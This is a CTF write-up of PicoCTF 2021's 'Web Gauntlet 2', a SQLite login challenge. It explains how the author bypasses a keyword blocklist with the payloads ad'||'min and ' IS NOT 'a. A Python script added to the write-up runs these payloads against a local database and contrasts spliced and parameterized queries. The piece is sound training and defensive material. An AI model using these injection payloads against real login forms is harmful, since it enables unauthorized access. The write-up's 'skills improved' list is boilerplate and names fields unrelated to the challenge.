Contents

๐ŸŒ Web Gauntlet 2

A detailed write-up of the Web challenge 'Web Gauntlet 2' from PicoCTF - 2021

/images/PicoGym/PicoCTF-2021/WebGauntlet2/challenge_presentation.png
Challenge Presentation

📊 Challenge Overview

🏆 Event: PicoGym (Event Link)
🔰 Category: Web 🌐
💎 Points: 500 (Out of 500 total)
⭐ Difficulty: 🟡 Medium (Personal Rating: 2/10)
👤 Author: madStacks (Profile)
🎮 Solves (at the time of flag submission): 7.331 solve rate
📅 Date: 20-02-2025 (PicoGym)
🦾 Solved By: mH4ck3r0n3 (Team: )

๐Ÿ“ Challenge Information

This website looks familiar… Log in as admin Site: http://mercury.picoctf.net:65261/ Filter: http://mercury.picoctf.net:65261/filter.php

🎯 Challenge Files & Infrastructure

Provided Files

Files: None

๐Ÿ” Initial Analysis

First Steps

Initially, the website appears as follows:

/images/PicoGym/PicoCTF-2021/WebGauntlet2/site_presentation.png
Site Presentation

Given the obvious message, we already know it’s an SQL Injection. In the hints, I found that it’s related to SQLite. The first thing I did to test was send username=a and password=a:

/images/PicoGym/PicoCTF-2021/WebGauntlet2/first_try.png
First Try

The query being executed is shown at the top (SELECT username, password FROM users WHERE username='a' AND password='a'), so this is not a blind injection: every attempt echoes the exact SQL the server ran. Our goal is likely to log in as admin, given the error message not admin. The challenge description contained another link:

/images/PicoGym/PicoCTF-2021/WebGauntlet2/filter.png
Filter

As we can see, filters are applied to the query. I cannot use or, and, true, false, union, like, =, >, <, ;, --, /*, */, or admin. So, I need to come up with another way to access as the admin user. After doing a bit of research, I found a page that was quite helpful: https://www.sqlitetutorial.net/. Let’s proceed with the exploitation.

🔬 Vulnerability Analysis

Potential Vulnerabilities

  • SQL Injection

🎯 Solution Path

Exploitation Steps

Initial setup

The first thing we need to figure out is how to form the admin username, since comments are blocked and admin is filtered. So, continuing to search in the Functions->String Functions section (https://www.sqlitetutorial.net/sqlite-string-functions/), I found the string concatenation operator in SQLite, which is ||. Using this operator, we can concatenate two strings to bypass the filter on admin.

ad'||'min

This way, by placing || outside the quotes, it is parsed as the SQL concatenation operator rather than as part of the string literal, so 'ad'||'min' evaluates to admin at query time while the literal token admin never appears in the request. Now that we know how to form the word admin for the username, we need a way to validate the password and make the query return True even if we don’t know the actual password. Let’s proceed with the exploitation.

Exploitation

Continuing the search, I found the IS operator, which can also be used with a negation IS NOT. I initially tried:

' IS '

to form the final query: SELECT username, password FROM users WHERE username='ad'||'min' AND password='' IS '', but it didn’t work. I thought '' would be equal to '', and therefore it should have returned True. So, I tried the negation instead:

' IS NOT 'a

forming the final query: SELECT username, password FROM users WHERE username='ad'||'min' AND password='' IS NOT 'a'. This time, it should definitely return True since '' is not equal to 'a'. Indeed, after testing the injection:

/images/PicoGym/PicoCTF-2021/WebGauntlet2/injection.png
Injection

it succeeded, and as indicated by the message, I then visited the /filter.php route and was able to obtain the flag.
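As an added illustration, not code from the original write-up or from the challenge itself, the following Python script reproduces the query shape shown at the top of the page against an in-memory SQLite database holding one constructed admin row with a placeholder password, and places the string-spliced query beside the parameterized form a defender would ship. It also settles why the ' IS ' attempt above failed while ' IS NOT 'a succeeded: in SQLite, = and IS sit at the same precedence level and associate left to right, so password='' IS '' parses as (password='') IS '', which compares the integer 0 with an empty string and is false, whereas (password='') IS NOT 'a' is true for every row. The blocklist helper is my reconstruction of the list shown on /filter.php and is assumed to be case-insensitive; the real filter's implementation is not on the page.

```python
import sqlite3

# Constructed sample data: one admin row with a made-up password.
# Nothing here comes from the challenge server.
SAMPLE_USERS = [("admin", "s3cret-placeholder")]

# Reconstruction of the tokens listed on /filter.php (assumed case-insensitive).
BLOCKED_TOKENS = ["or", "and", "true", "false", "union", "like",
                  "=", ">", "<", ";", "--", "/*", "*/", "admin"]


def make_db():
    """Create an in-memory SQLite database with the users table the page shows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def passes_blocklist(value):
    """True when none of the blocked tokens occur in the input (case-insensitive).
    Shows that a keyword blocklist is not a boundary: the || operator and the
    IS NOT comparison contain none of the listed tokens."""
    lowered = value.lower()
    return not any(token in lowered for token in BLOCKED_TOKENS)


def vulnerable_login(conn, username, password):
    """The query shape echoed by the challenge: user input spliced into SQL text.
    Returns True when any row comes back, mirroring the login check."""
    sql = (f"SELECT username, password FROM users "
           f"WHERE username='{username}' AND password='{password}'")
    return conn.execute(sql).fetchone() is not None


def safe_login(conn, username, password):
    """Hardened form: bound parameters. The input is compared as a string value
    and never parsed as SQL, so || and IS NOT are just characters in a literal.
    No blocklist is needed at all."""
    sql = "SELECT username, password FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def sqlite_truth(conn, expr):
    """Evaluate a bare SQLite expression on the admin row and return its 0/1 result.
    Used to show the precedence behind the two IS variants on the page:
      password='' IS ''      -> (password='') IS ''      -> 0 IS ''      -> 0
      password='' IS NOT 'a' -> (password='') IS NOT 'a' -> 0 IS NOT 'a' -> 1
    """
    row = conn.execute(f"SELECT {expr} FROM users WHERE username='admin'").fetchone()
    return row[0]


if __name__ == "__main__":
    db = make_db()
    user_payload, pass_payload = "ad'||'min", "' IS NOT 'a"   # payload from the write-up
    print("blocklist lets username through:", passes_blocklist(user_payload))
    print("blocklist lets password through:", passes_blocklist(pass_payload))
    print("spliced query logs in         :", vulnerable_login(db, user_payload, pass_payload))
    print("parameterized query logs in   :", safe_login(db, user_payload, pass_payload))
    print("password='' IS ''       ->", sqlite_truth(db, "password='' IS ''"))
    print("password='' IS NOT 'a'  ->", sqlite_truth(db, "password='' IS NOT 'a'"))
```

The lesson for the defending side is the contrast between the two login functions: the same two inputs that satisfy the blocklist and return a row from the spliced query return nothing from the parameterized one, because parameter binding removes the code/data confusion that the filter was only ever patching around.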

Flag capture

/images/PicoGym/PicoCTF-2021/WebGauntlet2/manual_flag.png
Manual Flag

๐Ÿ› ๏ธ Exploitation Process

Approach

The exploit sends the payload in a POST request to trigger the SQL Injection vulnerability, then issues a GET request to the /filter.php route to retrieve the flag, extracting it from the server response with a regular expression.

🚩 Flag Capture

Flag

Proof of Execution

/images/PicoGym/PicoCTF-2021/WebGauntlet2/automated_flag.png
Automated Flag
Screenshot of successful exploitation

🔧 Tools Used

Tool: Python (Purpose: Exploit)

💡 Key Learnings

Skills Improved

  • Binary Exploitation
  • Reverse Engineering
  • Web Exploitation
  • Cryptography
  • Forensics
  • OSINT
  • Miscellaneous

📚 References & Resources

Learning Resources


📊 Final Statistics

Time to Solve: 00:12 (From start to flag)
Global Ranking (at the time of flag submission): (Challenge ranking)
Points Earned: 500 (Team contribution)

Created: 20-02-2025 • Last Modified: 20-02-2025 • Author: mH4ck3r0n3 • Team: